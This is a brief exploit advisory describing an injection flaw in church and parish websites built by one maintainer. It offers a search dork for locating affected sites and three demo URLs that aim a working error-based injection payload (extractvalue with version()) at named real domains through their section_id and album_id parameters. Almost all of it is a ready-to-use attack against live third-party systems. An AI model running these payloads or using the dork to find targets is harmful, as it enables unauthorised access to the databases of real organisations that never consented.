# Exploit Title: Fr. Evan Gomes SVD Xpath Injection Vulnerability # Exploit Author: Behrouz Mansoori # Date: 2021/03/02 # Dork : "Website Maintained by Fr. Evan Gomes SVD" # Tested On: Windows 10 / Firefox ##################################### #poc: serach Dork : "Website Maintained by Fr. Evan Gomes SVD" #demo: https://sarvasevasanghmumbai.org/section.php?section_id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ https://www.svdinm.com/section.php?section_id=29%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ https://starnoldsaduvassery.com/web/view_album.php?album_id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ ##################################### Email : mr.mansoori@yahoo.com Instagram : behrouz_mansoori #####################################